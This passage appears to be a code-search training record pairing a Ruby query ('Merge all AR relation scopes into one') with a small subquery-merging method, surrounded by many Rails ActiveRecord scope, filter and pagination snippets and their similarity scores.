"def scaffold_get_objects(options)\n optionshash = {}\n data = self.all\n if options[:conditions]\n conditions = options[:conditions]\n if conditions && Array === conditions && conditions.length > 0\n if String === conditions[0]\n data = data.all(:conditions => conditions)\n else\n conditions.each do |cond|\n next if cond.nil?\n data = case cond\n when Hash, String then data.all(:conditions => [cond.gsub(\"NULL\",\"?\"),nil])\n when Array then \n if cond.length==1\n data.all(:conditions => [cond[0].gsub(\"NULL\",\"?\"),nil])\n else\n data.all(:conditions => cond)\n end\n when Proc then data.all(&cond)\n end\n end\n end\n end\n end\n slice = nil\n if options[:limit]\n startpos = options[:offset] || 0\n endpos = options[:limit]\n slice = [startpos,endpos]\n end\n # TODO includes break SQL generation\n # optionshash[:links] = options[:include] if options[:include]\n # optionshash[:links] = [optionshash[:links]] unless optionshash[:links].is_a?(Array)\n if options[:order] then\n optionshash[:order] = get_ordering_options(options[:order])\n end\n if slice then\n q = data.all(optionshash).slice(*slice)\n else\n q = data.all(optionshash)\n end\n #p repository.adapter.send(\"select_statement\",q.query)\n q.to_a\n end",
"def results_with_rows\n load_from_rows(@dataset.all, true)\n end",
"def index\n @up_to_date = check_if_asqs_up_to_date\n # If we're passed a tag in the params...\n init_results_for_tag && return if params[:tag]\n # If we're passed a search string...\n init_results_for_search && return if params[:search]\n # Otherwise, show all the asqs\n @asqs = Asq.joins(\"left join asq_statuses on asq_statuses.status_enum = \\\n asqs.status\")\n .order(\"disabled ASC, query_type ASC, \\\n asq_statuses.sort_priority ASC\")\n .paginate(page: params[:page])\n end",
"def results\n populate\n @results\n end",
"def targeted_app_results\n selected_app_results.where(account_path: selected_app_results.first.account_path)\n .page(0).per(10)\n end",
"def indexVilla\n @q = Vendor.where(entry:'Villa').ransack(params[:q])\n\n @per_page = params[:per_page] || Vendor.per_page || 20\n @vendors = @q.result(:distinct=>true).paginate( :per_page => @per_page, :page => params[:page])\n if @vendors.size.zero?\n flash[:notice] = \"No Matches Found\"\n end \n end",
"def generate_search_query(per_page)\n q = Replay.select(\"DISTINCT(replays.*)\").public.processed.includes(:event, :plays, :players)\n \n player_id = nil\n if params[:player] =~ /\\A#\\d+\\z/\n player_id = params[:player][1..-1].to_i\n end\n\n if player_id\n q = q.joins(:plays).where(:plays => {:player_id => player_id})\n elsif !params[:player].blank?\n q = q.joins(:players).where(\"players.name ILIKE ?\", \"%#{params[:player]}%\")\n else\n end\n \n unless params[:league].blank?\n q = q.joins(:players).where(\"players.league_1v1 = ?\", params[:league])\n end\n \n unless params[:gateway].blank?\n q = q.where(\"replays.gateway = ?\", params[:gateway])\n end\n \n unless params[:map].blank?\n q = q.where(\"replays.map_name LIKE ?\", \"%#{params[:map]}%\")\n end\n \n unless params[:version].blank?\n q = q.where(:version => params[:version])\n end\n \n unless params[:game_format].blank?\n q = q.where(:game_format => params[:game_format])\n end\n \n mu = params[:mu]\n @any = false\n if mu == \"tvp\"\n q = q.where(:terrans => 1, :protosses => 1, :zergs => 0)\n elsif mu == \"tvz\"\n q = q.where(:terrans => 1, :protosses => 0, :zergs => 1)\n elsif mu == \"pvz\"\n q = q.where(:terrans => 0, :protosses => 1, :zergs => 1)\n elsif mu == \"tvt\"\n q = q.where(:terrans => 2, :protosses => 0, :zergs => 0)\n elsif mu == \"pvp\"\n q = q.where(:terrans => 0, :protosses => 2, :zergs => 0)\n elsif mu == \"zvz\"\n q = q.where(:terrans => 0, :protosses => 0, :zergs => 2)\n else\n @any = true\n end\n \n if params[:order] == \"date_posted\"\n q = q.order(\"replays.created_at DESC\")\n elsif params[:order] == \"date_played\"\n q = q.order(\"replays.saved_at DESC\")\n elsif params[:order] == \"downloads\"\n q = q.order(\"replays.downloads DESC\")\n elsif params[:order] == \"comments\"\n q = q.order(\"replays.comments_count DESC\")\n else\n q = q.recent\n params[:order] = \"date_posted\"\n end\n \n # @replays = q.includes(:plays => [:player]).paginate(:per_page => 5, :page => params[:page])\n @replays = q.paginate(:per_page => per_page, :page => params[:page])\n end"
] |
[
"0.6160042",
"0.6120058",
"0.6064114",
"0.60056746",
"0.59882987",
"0.5966952",
"0.58973354",
"0.58908457",
"0.58827794",
"0.58698183",
"0.5845055",
"0.5842389",
"0.58325195",
"0.5831484",
"0.5828574",
"0.58214664",
"0.5814785",
"0.58070767",
"0.579143",
"0.57909274",
"0.57800126",
"0.57417184",
"0.5728857",
"0.57179356",
"0.57000357",
"0.5698483",
"0.56859106",
"0.56725526",
"0.56723505",
"0.5666122",
"0.5664804",
"0.56520045",
"0.5647802",
"0.56463283",
"0.5642122",
"0.56386554",
"0.5628479",
"0.5615538",
"0.5614155",
"0.56114644",
"0.5583786",
"0.5574476",
"0.5558273",
"0.55547637",
"0.55537623",
"0.55499554",
"0.55488086",
"0.5547902",
"0.5546638",
"0.5545328",
"0.55412626",
"0.554102",
"0.55352426",
"0.5530885",
"0.55290246",
"0.55284",
"0.5524451",
"0.55190045",
"0.5517675",
"0.5516855",
"0.55137306",
"0.55134577",
"0.5501921",
"0.5496571",
"0.549476",
"0.5494367",
"0.5494367",
"0.5494367",
"0.54939437",
"0.54788816",
"0.5473711",
"0.5472205",
"0.54704046",
"0.5469454",
"0.54611635",
"0.5450192",
"0.54480046",
"0.5445804",
"0.5442144",
"0.5441055",
"0.54360276",
"0.543442",
"0.54334116",
"0.54319966",
"0.54317325",
"0.5425479",
"0.54245675",
"0.5424179",
"0.5419691",
"0.5419089",
"0.5416698",
"0.54137194",
"0.5412463",
"0.5411796",
"0.5411666",
"0.54113466",
"0.5410449",
"0.5408026",
"0.53969646",
"0.53945154",
"0.53917176"
] |
0.0
|
-1
|
Merge all AR relation scopes into one.
|
def subquery
subqueries.
compact.
inject(&:merge)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def merge(new_scopes); end",
"def all\n if current_scope\n current_scope.clone\n else\n default_scoped\n end\n end",
"def all\n @env.reverse.inject { |env, scope| env.merge scope }\n end",
"def merge!(scope)\n @options.merge!(scope.options)\n\n @attributes += scope.attributes\n @associations.merge!(scope.associations)\n\n @attributes.uniq!\n\n self\n end",
"def relation_scope\n if @scope\n @model_class.unscoped { @scope.send(resource_name).scope }\n else\n @model_class.unscoped\n end\n end",
"def scopes\n scope ? [scope] : []\n end",
"def scope_chain\n scope ? [[scope]] : [[]]\n end",
"def resolve\n scope.all\n end",
"def apply_scopes(*)\n relation = super\n relation = relation.accessible_by(current_ability) if scope_accessible?\n relation\n end",
"def scopes\n read_inheritable_attribute(:scopes) || write_inheritable_attribute(:scopes, {})\n end",
"def scope\n assoc_scope = method(:association_scope)\n join_scope = method(:join_association_scope)\n\n ->(join_or_parent) {\n if join_or_parent.is_a?(ActiveRecord::Associations::JoinDependency::JoinAssociation)\n join_scope[join_or_parent]\n elsif join_or_parent.is_a?(ActiveRecord::Base)\n assoc_scope[join_or_parent]\n else\n where(nil)\n end.extending(Relation::Iterable)\n }\n end",
"def expand(scopes)\n scopes = Array(scopes.to_a)\n registered_scopes = scopes.filter { |sc| @mapping.key?(sc) }\n result = registered_scopes + registered_scopes.reduce([]) { |memo, sc|\n memo + Array(@mapping.fetch(sc))\n }.uniq\n\n Scopes.wrap(result)\n end",
"def scopes\n @@scopes ||= {}\n end",
"def scoped_all(organization_scoped_ar)\n organization_scoped_ar.organization_scope(organization).all\n end",
"def scopes; end",
"def scopes\n @scopes ||= {}\n end",
"def all_scopes\n @all_scopes ||=\n {'identity' => (auth['scope'] || apps_permissions_users_list[user_id].to_h['scopes'].to_a.join(',')).to_s.split(',')}\n .merge(auth['scopes'].to_h)\n end",
"def apply_standard_scope\n each_sort do |attribute, direction|\n @scope = resource.adapter.order(@scope, attribute, direction)\n end\n @scope\n end",
"def all_associations\n @all_associations ||= (\n # field associations\n @fields.collect { |field|\n field.associations.values\n }.flatten +\n # attribute associations\n @attributes.collect { |attrib|\n attrib.associations.values\n }.flatten\n ).uniq.collect { |assoc|\n # get ancestors as well as column-level associations\n assoc.ancestors\n }.flatten.uniq\n end",
"def scopes\n @scope.scopes\n end",
"def scope\n return @scope if @scope\n\n @scope = hard_scope.dup\n soft_dependencies = []\n\n enabled_dependencies.each do |dependency|\n binds = nil\n node = nil\n\n if dependency.polymorphic?\n alias_prefix = SOFT_PREFIX if @scope.manager.ast.with&.children&.map(&:left)&.map(&:name)&.include?(\"#{HARD_PREFIX}#{dependency.name.to_s.pluralize}\")\n dependency.models.each do |model|\n next unless model.scoped?\n next unless circular_dependency?(dependency, model) || alias_prefix\n\n model_manager = model.hard_scope.manager.dup\n model_manager.projections = [\n Arel::Nodes::As.new(Arel::Nodes::Quoted.new(model.clazz.name), Arel::Nodes::SqlLiteral.new(:type.to_s)),\n model.primary_key.as(:id.to_s)\n ]\n\n if node\n binds.concat(model.hard_scope.binds)\n node = node.union_all(model_manager)\n else\n binds = model.hard_scope.binds\n node = model_manager.ast\n end\n end\n else\n next unless circular_dependency?(dependency) && dependency.soft?\n next unless dependency.models.first.scoped?\n\n model = dependency.models.first\n binds = model.hard_scope.binds\n manager = model.hard_scope.manager.dup\n manager.projections = [model.primary_key.as(:id.to_s)]\n node = manager.ast\n end\n\n next unless node\n\n dependencies = Arel::Table.new(\"#{alias_prefix}#{dependency.name.to_s.pluralize}\")\n\n on = dependencies[:id].eq(arel_table[dependency.foreign_key])\n on = dependencies[:type].eq(arel_table[dependency.foreign_type]).and(on) if dependency.polymorphic?\n\n @scope.manager\n .join(dependencies, Arel::Nodes::OuterJoin)\n .on(on)\n .prepend_with(Arel::Nodes::As.new(dependencies, Arel::Nodes::Grouping.new(node)))\n @scope.binds.unshift(*binds)\n soft_dependencies << DependencyTable.new(dependency, dependencies)\n end\n\n unless soft_dependencies.empty?\n @scope.manager.projections = enabled_columns.keys.map do |column|\n info = soft_dependencies.find { |dt| dt.dependency.foreign_key == column }\n next info.table[info.dependency.models.first.clazz.primary_key].as(info.dependency.foreign_key) if info\n\n info = soft_dependencies.find { |dt| dt.dependency.foreign_type == column }\n next info.table[:type].as(info.dependency.foreign_type) if info\n\n arel_table[column]\n end\n end\n\n @scope\n end",
"def associations_scope\n model_class_name.constantize.all\n end",
"def associations_scope\n model_class_name.constantize.all\n end",
"def expand_scopes(scopes)\n scopes.map do |scope|\n [scope, descendents(scope)]\n end.flatten.uniq.sort\n end",
"def define_all_scopes\n if self.resource_definition[\"scopes\"]\n self.resource_definition[\"scopes\"].each_pair do |name, opts|\n self.scope(name, opts)\n end\n end\n true\n end",
"def scopes\n model.scopes\n end",
"def scopes\n scope_names.to_a.sort\n end",
"def combine!(check_overlap = true)\n if scope = self.aars_options[:scope]\n scope = scope.is_a?(Array) ? scope : [scope]\n select = \"DISTINCT \" + scope.map { |a| connection.quote_column_name(a) }.join(\", \")\n scopes = find(:all, :select => select)\n scopes.each { |scope| combine_with_scope!(scope.attributes, check_overlap)}\n else\n combine_with_scope!(nil, check_overlap)\n end\n end",
"def scopes *names\n self.scope_names ||= []\n\n names.each do |scope|\n self.scope_names << scope\n\n # hand chaining duties off to the ResourceProxy instance\n define_singleton_method scope do\n resource_proxy.append_scope(scope)\n end\n\n # ResourceProxy instance also needs to respond to scopes\n resource_proxy_class.send(:define_method, scope) do\n append_scope(scope)\n end\n end\n\n # self.scope_names.freeze\n end",
"def all_favorites options = {}\n if options.key?(:multiple_scopes) == false\n validate_scopes __method__, options\n elsif options[:multiple_scopes] == true\n results = {}\n options[:scope].each do |scope|\n favorites_scope = favorites_scoped scope\n results[scope] = favorites_scope = apply_options_to_scope favorites_scope, options\n end\n return results\n else\n favorites_scope = favorites_scoped options[:scope]\n return favorites_scope = apply_options_to_scope(favorites_scope, options)\n end\n end",
"def scope\n @scope.dup\n end",
"def scopes\n self.class.scopes\n end",
"def union_scope(*scopes)\n id_column = \"#{table_name}.id\"\n sub_query = scopes.map { |s| s.select(id_column).to_sql }.join(\" UNION \")\n where \"#{id_column} IN (#{sub_query})\"\n end",
"def all_associations(opts={})\n associations = self.models.map {|m| m.associations}.flatten\n if opts[:unique]\n unique_codes = associations.map {|a| a[:code] }.uniq\n unique_associations = []\n associations.each do |a|\n if unique_codes.include?(a[:code])\n unique_associations << a\n unique_codes.delete(a[:code])\n end\n end\n return unique_associations\n else\n return associations\n end\n end",
"def query_scope\n record_class.public_send(include_strategy, included_associations)\n end",
"def build_scope_from_columns\n self.scope\n end",
"def associations!(merge: true)\n merge ? PathMerger.new(@associations).merge : @associations\n end",
"def all(options = {})\n objs = decorated_class.all.map { |o| new(o) }\n resolve_associations(objs, options)\n end",
"def aggregate scope\n # TODO fucking slow\n data = {}\n data[:sha] = self.sha\n data[:short_sha] = self.short_sha\n data[:author_name] = self.author.name\n data[:author_email] = self.author.email\n data[:time] = self.time.xmlschema\n data[:message] = self.message\n data[:stats] = self.stats\n if scope == :single\n data[:project] = {}\n data[:current_branch] = @project.branchname\n data[:project][:path] = @project.path\n data[:project][:name] = @project.name\n data[:project][:remotes] = @project.remotes.map(&:name)\n data[:project][:remote_urls] = @project.remotes.map(&:url)\n data[:project][:remote_branches] = @project.remote_branches\n data[:project][:identifier] = self.project_identifier\n end\n data\n end",
"def find_all(options = {})\n construct_scope(options).to_a\n end",
"def reset_associations_loaded\n associations_loaded = []\n end",
"def target_scope\n AssociationRelation.create(klass, self).merge!(klass.scope_for_association)\n end",
"def all_orderable\n if self.class.orderable_scope.any?\n scope = self.class.orderable_scope.inject({}) do |where, scope_name|\n where[scope_name] = self[scope_name]\n where\n end\n self.class.where(scope)\n else\n self.class.scoped\n end\n end",
"def relation_all(model)\n validate_model(model)\n model.all\n end",
"def aggregated_associations\n @aggregated_associations ||= []\n end",
"def scopes\n scopes = scope ? scope.split(/\\s+/) : []\n scopes = attributes[:scope]\n Set.new(scopes).to_s\n end",
"def scope\n @scope ||= {}\n end",
"def scope\n @scope ||= {}\n end",
"def map(scopes)\n scpes = Array(scopes.to_a).reduce([]){|memo, sc|\n memo + Array(@mapping.fetch(sc, sc))\n }.uniq\n\n Scopes.wrap(scpes)\n end",
"def finalize_associations!(relations:)\n super do\n associations.map do |definition|\n Memory::Associations.const_get(definition.type).new(definition, relations)\n end\n end\n end",
"def use_scopes(*klasses, &block)\n self.scope_context += klasses.flatten\n yield\n self.scope_context -= klasses.flatten\n nil # should not be chained\n end",
"def all\n @data_adapter.relations\n end",
"def all_related_models\n via_assay = related_assays.collect do |assay|\n assay.model_masters\n end.flatten.uniq.compact\n via_assay | related_models\n end",
"def associations\n @associations.dup\n end",
"def scoped_all\n # The range is shared among all subclasses of the base class, which directly extends ActiveRecord::Base\n self.class.base_class.where(scoped_condition)\n end",
"def all_children(scope = {})\n full_set(scope) - [self]\n end",
"def associations\n @_associations.dup\n end",
"def all_associations(opts={})\n associations = self.models.map {|m| m.association_fields}.flatten\n if opts[:unique]\n unique_codes = associations.map {|a| a[:code] }.uniq\n unique_associations = []\n associations.each do |a|\n if unique_codes.include?(a[:code])\n unique_associations << a\n unique_codes.delete(a[:code])\n end\n end\n return unique_associations\n else\n return associations\n end\n end",
"def all_scopes(_user_id=nil)\n debug{\"_user_id: #{_user_id}, @all_scopes: #{@all_scopes}\"}\n if _user_id && !@all_scopes.to_h.has_key?('identity') || @all_scopes.nil?\n @all_scopes = (\n scopes = case\n when params['scope']\n {'classic' => params['scope'].words}\n when params['scopes']\n params['scopes']\n when is_app_token?\n apps_permissions_scopes_list\n end\n \n scopes['identity'] = apps_permissions_users_list(_user_id) if _user_id && is_app_token?\n params['scopes'] = scopes\n )\n else\n @all_scopes\n end\n end",
"def static_scopes\n scopes = self.scope_definition\n .select { |_k, v| v.blank? }\n .keys\n scopes | [:first, :last, :all]\n end",
"def apply_to_scope(scope)\n scope\n end",
"def filter_scopes\n @filter_scopes ||= scopes.inject({}) do |result, element|\n result[element.first] = element.last if element.last[:type] != :boolean\n result\n end\n end",
"def data_scope\n if Company.columns.map(&:name).include?(\"deleted_at\")\n yield\n else\n Company.unscoped do\n Recognition.unscoped do\n User.unscoped do\n yield\n end\n end\n end\n end\n end",
"def apply_custom_scope\n each_sort do |attribute, direction|\n @scope = custom_scope\n .call(@scope, attribute, direction, resource.context)\n end\n @scope\n end",
"def related_models\n via_assay = assays.collect(&:models).flatten.uniq.compact\n via_assay | models\n end",
"def attributes(*attributes)\n @attributes.concat(attributes)\n @scope = @scope.includes(@scope.filter_associations(attributes))\n end",
"def empty_scope\n scope_from_product_ids([])\n end",
"def reflect_on_all_associations(*macros)\n relations.values.select { |meta| macros.include?(meta.macro) }\n end",
"def relations\n @relations ||= process_rels\n end",
"def people_scope\n Person.all.order_by_full_name\n end",
"def union(*relations)\n relations.all?{|r| is_relation!(r)}\n relations.inject(nil){|memo,r| memo.nil? ? r : memo.union(r)}\n end",
"def extra_scopes()\n @scopes_added_by_common_scopes\n end",
"def scope\n @scope ||= Array(@root_scope) + [Inflector.underscore(name)]\n end",
"def all_favorites(options = {})\n if options.key?(:multiple_scopes) == false\n validate_scopes(__method__, options)\n elsif options[:multiple_scopes]\n results = {}\n options[:scope].each do |scope|\n favorites_scope = favorites_scoped(\n scope: scope, multiple_scopes: false\n )\n results[scope] = apply_options_to_scope(\n favorites_scope, options\n )\n end\n results\n else\n favorites_scope = favorites_scoped(\n scope: options[:scope], multiple_scopes: false\n )\n apply_options_to_scope(\n favorites_scope, options\n )\n end\n end",
"def resolve!\n @relations.map(&:resolve!)\n end",
"def apply_and_return_additional_attributes_to(scope:)\n # With this short-circuit we preserve the ability to have\n # `.count` work on the scope.\n return scope if additional_attributes.empty?\n\n attr_table_name = Models::AdditionalAttribute.quoted_table_name\n work_table_name = scope.quoted_table_name\n select_fields = scope.column_names.map { |column_name| \"#{work_table_name}.#{column_name}\" }\n group_by_fields = select_fields.clone\n\n additional_attributes.each do |attribute|\n table_name = attribute.fetch(:join_as_table_name)\n key = attribute.fetch(:key)\n scope = scope.joins(\n %(LEFT OUTER JOIN #{attr_table_name} AS #{table_name} ON #{table_name}.work_id = #{work_table_name}.id AND #{table_name}.key = \"#{key}\")\n )\n\n # Given that we may have multiple values, we need to do some\n # concatenation so that we can preserve a single row per\n # work.\n select_fields << \"GROUP_CONCAT(DISTINCT #{table_name}.value SEPARATOR ', ') AS #{key}\"\n end\n\n # Given that each additional attribute could have multiple\n # values, we need to group by the attributes on the base\n # table.\n scope = scope.group(group_by_fields)\n\n # Note this must return the modified scope.\n scope.select(select_fields.join(\", \"))\n end",
"def all(params={})\n scoped_attributes = self.class.scopes.inject({}){|r,k| r.merge(k.to_s => send(k))}\n scoped_attributes.merge!(params)\n body = connection.send(collection_method, scoped_attributes).body\n\n collection = self.load(body[collection_root])\n collection.merge_attributes(Cistern::Hash.slice(body, \"count\", \"next_page\", \"previous_page\"))\n collection\n end",
"def relations\n return @relations if defined?(@relations)\n\n relations = injected_options.fetch(:relations, nil)\n relations = allowed_options.fetch(:relations, []) if relations.nil?\n\n @relations = Relations.new(relations, includes)\n end",
"def freeze\n associations\n super\n associations.freeze\n self\n end",
"def clear_association_scope_cache # :nodoc:\n @association_scope_cache.clear\n end",
"def entity_scope type, viewer\n # type.constantize.tagged_by list.name_tag, [ list.owner_id, viewer.id ]\n type.constantize.joins(:taggings).merge(Tagging.list_scope @list, viewer.id)\n end",
"def renumber_all\n scopes = []\n # only call it once for each scope_condition (if the scope conditions are messed up, this will obviously cause problems)\n roots.each do |r|\n r.renumber_full_tree unless scopes.include?(r.scope_condition)\n scopes << r.scope_condition\n end\n end",
"def collection\n get_collection_ivar || begin\n c = end_of_association_chain\n set_collection_ivar(c.respond_to?(:scoped) ? c.scoped : c.all)\n end\n end",
"def resolve_collections\n @resolved_collections = resolved_associations_map.inject({}) do |hash, (k,v)|\n collection_records = []\n collection_associations = Array.wrap(v[:associations])\n collection_associations.each do |association|\n add_records_from_collection_association(relation, association, collection_records)\n end\n collection_records.flatten!\n collection_records.compact!\n collection_records.uniq!\n hash[k] = collection_records\n hash\n end\n end",
"def namespace_scopes\n super\n end",
"def full_set(scope = {})\n if exclude = scope.delete(:exclude)\n exclude_str = \" AND NOT (#{base_set_class.sql_for(exclude)}) \"\n elsif new_record? || self[right_col_name] - self[left_col_name] == 1\n return [self]\n end\n self.class.find_in_nested_set(:all, { \n :order => \"#{prefixed_left_col_name}\",\n :conditions => \"#{scope_condition} #{exclude_str} AND (#{prefixed_left_col_name} BETWEEN #{self[left_col_name]} AND #{self[right_col_name]})\"\n }, scope)\n end",
"def model_relationships\n hash = ActiveSupport::OrderedHash.new\n reflect_on_all_associations.map { |i| hash[i.name] = i.macro }\n return hash\n end",
"def clear(scope = :all)\n case scope\n when :all\n @plurals, @singulars, @uncountables = [], [], []\n else\n instance_variable_set \"@#{scope}\", []\n end\n end",
"def reset(scope = :all)\n case scope\n when :all\n %i[singulars plurals uncountables].map {|s| clear(s) }\n else\n clear(scope)\n end\n end",
"def with_default_scope\n queryable.with_default_scope\n end",
"def leave_scope\n # puts __callee__\n current_scope = symbol_table.current_scope\n parent_scope = current_scope.parent\n return unless parent_scope\n\n # Retrieve all i_names from current scope\n i_name_set = Set.new(current_scope.defns.values.map(&:i_name))\n\n # Remove all associations from queue until the scope's bookmark\n items = blackboard.leave_scope\n curr_asc, ancestor_asc = items.partition do |a|\n i_name_set.include? a.i_name\n end\n vars_to_keep = Set.new\n\n ancestor_asc.each do |assoc|\n if assoc.dependencies(self).intersect?(i_name_set)\n dependents = assoc.dependencies(self).intersection(i_name_set)\n vars_to_keep.merge(dependents)\n end\n enqueue_association(assoc, nil) # parent_scope\n end\n\n assocs_to_keep = []\n\n unless vars_to_keep.empty?\n loop do\n to_keep, to_consider = curr_asc.partition do |a|\n vars_to_keep.include? a.i_name\n end\n break if to_keep.empty?\n\n to_keep.each do |a|\n vars_to_keep.merge(a.dependencies(self).intersection(i_name_set))\n end\n assocs_to_keep.concat(to_keep)\n curr_asc = to_consider\n end\n end\n symbol_table.leave_scope\n\n vars_to_keep.each do |i_name|\n v = LogVar.new(i_name)\n v.suffix = ''\n symbol_table.insert(v)\n end\n\n assocs_to_keep.each { |a| blackboard.enqueue_association(a) }\n end",
"def renumber_all\n scopes = []\n # only call it once for each scope_condition (if the scope conditions are messed up, this will obviously cause problems)\n roots.each do |r|\n r.renumber_full_tree unless scopes.include?(r.scope_condition)\n scopes << r.scope_condition\n end\n end",
"def each\n @scope.each do |record|\n yield record.restrict(@context, options_with_eager_load)\n end\n end",
"def available_scopes\n (default_scopes << Doorkeeper.config.optional_scopes.to_a).flatten.uniq\n end",
"def finalize_associations\n @association_reflections.each_value(&:finalize)\n end",
"def nested_set_scope_without_default_scope(options = {})\n add_scope_conditions_to_options(options)\n\n self.class.base_class.unscoped.nested_set_scope options\n end",
"def scopes\n @scopes ||= config[:scopes] || []\n end",
"def base_scope\n ApplicationRecord.none\n end",
"def clear(scope = :all)\n case scope\n when :all\n clear(:acronyms)\n clear(:plurals)\n clear(:singulars)\n clear(:uncountables)\n clear(:humans)\n when :acronyms\n @acronyms = {}\n define_acronym_regex_patterns\n when :uncountables\n @uncountables = Uncountables.new\n when :plurals, :singulars, :humans\n instance_variable_set \"@#{scope}\", []\n end\n end",
"def initialize_relationships\n @mappers.each do |mapper|\n @relationships.merge(mapper.relationships.find_dependent(@model))\n end\n\n @relationships.freeze\n end",
"def scopes\n params['scope']\n end"
] |
[
"0.6877863",
"0.6873067",
"0.668376",
"0.6230345",
"0.6188568",
"0.6159825",
"0.6127702",
"0.60165966",
"0.5983767",
"0.5974696",
"0.5947624",
"0.5935974",
"0.5888036",
"0.5887737",
"0.58800286",
"0.5873672",
"0.5866571",
"0.5864613",
"0.5861562",
"0.58515227",
"0.58487016",
"0.5843094",
"0.5843094",
"0.5736831",
"0.5606691",
"0.5582978",
"0.54562193",
"0.5418009",
"0.5408315",
"0.5394606",
"0.53897524",
"0.538871",
"0.5370442",
"0.53602654",
"0.5359426",
"0.5358559",
"0.5352831",
"0.53483987",
"0.5338745",
"0.53233993",
"0.532337",
"0.5314632",
"0.5299036",
"0.52732396",
"0.5271718",
"0.5270734",
"0.5268054",
"0.5268054",
"0.5261176",
"0.5250181",
"0.5228763",
"0.5227976",
"0.52275366",
"0.52194214",
"0.52179915",
"0.5213944",
"0.5202492",
"0.5201005",
"0.51956284",
"0.5190985",
"0.519033",
"0.5190199",
"0.51899844",
"0.5172354",
"0.5169796",
"0.5166379",
"0.5164075",
"0.5163767",
"0.51586044",
"0.51575434",
"0.5150558",
"0.5145363",
"0.5133739",
"0.5130285",
"0.512247",
"0.51214457",
"0.5121026",
"0.511737",
"0.51173514",
"0.5114449",
"0.5112056",
"0.5097225",
"0.50785196",
"0.50714165",
"0.5069303",
"0.50667757",
"0.50655615",
"0.50655586",
"0.5064829",
"0.5064666",
"0.505261",
"0.505073",
"0.50458467",
"0.50389993",
"0.50308317",
"0.50198466",
"0.5013254",
"0.50073195",
"0.5006741",
"0.500554",
"0.4996932"
] |
0.0
|
-1
|
Optional method on child class. Basically we are calling each method that does one thing. You can add more filters / scopes in child class. Please call `super` to get basic scopes. Usage: def subqueries super + [new_filter, special_scope_for_child_class] end
|
def subqueries
[
select_distinct_on,
# default filters -- all scopes have them
filter_by_subscription_or_topics,
filter_by_start_date,
filter_by_end_date,
# grouping
group_distinct_on,
# ordering for GROUP BY
order_distinct_on,
]
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def inherited(subclass)\n super\n\n subclass.stradivari_filter_options(\n self.stradivari_filter_options\n )\n\n subclass.stradivari_scopes.update(\n self.stradivari_scopes\n )\n end",
"def _refine_top_query_scope\n # recommended before_filter for subclasses to restrict @parent_object further.\n raise \"Override in subclass.\"\n end",
"def inherited(base)\n base.instance_variable_set '@filters', {}\n end",
"def inherited(subclass)\n super\n subclass.scopes = scopes.dup\n end",
"def filter\n super\n end",
"def filter(*args)\n raise NotImplementedError, 'Subclass should implement.'\n end",
"def search_scope\n super\n end",
"def query\n super\n end",
"def conditions\n if self == Base\n own_conditions\n else\n superclass.conditions.merge(own_conditions)\n end\n end",
"def after_inherited(base)\n # E.g. filters = { automate: [:load_recipe, :load_session], edit: [:load_recipe] }\n base.class_eval do\n # |automate, [:load_recipe, :load_session]|\n filters.each_pair do |name, filter_list|\n\n # def automate_with_filters\n # load_recipe\n # load_session\n # automate_without_filters\n # end\n define_method \"#{ name }_with_filters\" do\n filter_list.each { |filter_name| send(filter_name) }\n send(\"#{ name }_without_filters\")\n end\n\n # alias_method_chain automate, filters\n alias_method \"#{ name }_without_filters\", name\n alias_method name, \"#{ name }_with_filters\"\n end\n end\n end",
"def addfilter( newfilter )\n if not subfilter\n @subfilter = newfilter\n else\n subfilter.addfilter( newfilter )\n end\n return self\n end",
"def scoped_all\n # The range is shared among all subclasses of the base class, which directly extends ActiveRecord::Base\n self.class.base_class.where(scoped_condition)\n end",
"def method_missing(method_name, *args, &block)\n if Query.instance_methods(false).include?(method_name)\n Query.new(self).send(method_name, *args, &block)\n else\n super\n end\n end",
"def prepare(base, settings)\n super\n\n prepare_sub_query(base, settings)\n end",
"def self_and_ancestors\n nested_set_scope.\n where(\n \"(#{self.class.quoted_table_name}.#{self.class.quoted_total_order_column_name} < ?\n and ? < (#{self.class.quoted_table_name}.#{self.class.quoted_snumv_column_name}/#{self.class.quoted_table_name}.#{self.class.quoted_sdenv_column_name})) or\n #{self.class.quoted_table_name}.#{self.class.quoted_primary_column_name} = ?\", self.total_order, self.total_order, self.primary_id\n )\n end",
"def inherited(subclass)\n subclass.sorter = sorter\n super\n end",
"def query_base\n @query_base ||= lambda do\n el = '?'\n [Func::UNACCENT].each do |func|\n el = \"#{func}(#{el})\"\n end\n el\n end.call\n end",
"def _update_dataset\n apply_instance_filters(super)\n end",
"def inherited(base); end",
"def filter(options={})\n super\n end",
"def filter_by_associations_add_conditions?\n super || self[:order] || self[:eager_limit_strategy] || self[:filter_limit_strategy]\n end",
"def descendants\n model_base_class.scoped(:conditions => descendant_conditions)\n end",
"def inherited(subclass); end",
"def predicate\n operand.predicate.and(super).optimize\n end",
"def filter(sparql)\n raise \"Must be overridden\"\n end",
"def inherited(child)\n super\n child.attribute_names = self.attribute_names ? self.attribute_names.dup : [:id]\n child.reverse_solr_name_cache = self.reverse_solr_name_cache ? self.reverse_solr_name_cache.dup : {}\n child.attribute_cache = self.attribute_cache ? self.attribute_cache.dup : {}\n child.facets = self.facets ? self.facets.dup : []\n child.solr_calc_attributes = self.solr_calc_attributes.present? ? self.solr_calc_attributes.dup : {}\n # child.derived_af_class\n\n # If there's no class between +LockedLdpObject+ and this child that's\n # already had +visibility+ and +owner+ defined, define them.\n child.class_eval do\n unless attribute_names.include?(:visibility)\n has_attribute :visibility, ::VOCABULARY[:jupiter_core].visibility, solrize_for: [:exact_match, :facet]\n end\n unless attribute_names.include?(:owner)\n has_attribute :owner, ::VOCABULARY[:jupiter_core].owner, solrize_for: [:exact_match]\n end\n unless attribute_names.include?(:record_created_at)\n has_attribute :record_created_at, ::VOCABULARY[:jupiter_core].record_created_at, type: :date,\n solrize_for: [:sort]\n end\n end\n end",
"def inherit_scope(other)\n @scope = other.scope\n end",
"def sub_filter(iter)\n filter = default_filter(iter)\n if iter.parent[0] == SELECT_RECORDS\n filter += \"AND records.rrecord=#{iter[3].split(\"@@@\")[1]}\" # Extract rrecord from the sort column\n end\n return filter\n end",
"def results(base_query)\n return base_query if @filters.nil?\n base_query.where @filters\n end",
"def scoped_collection(_parent_records)\n raise NotImplementedError.new 'override #scoped_collection in a subclass'\n end",
"def evaluate\n raise Error::MethodShouldBeOverridenByExtendingClassError if instance_of? Operand\n super\n end",
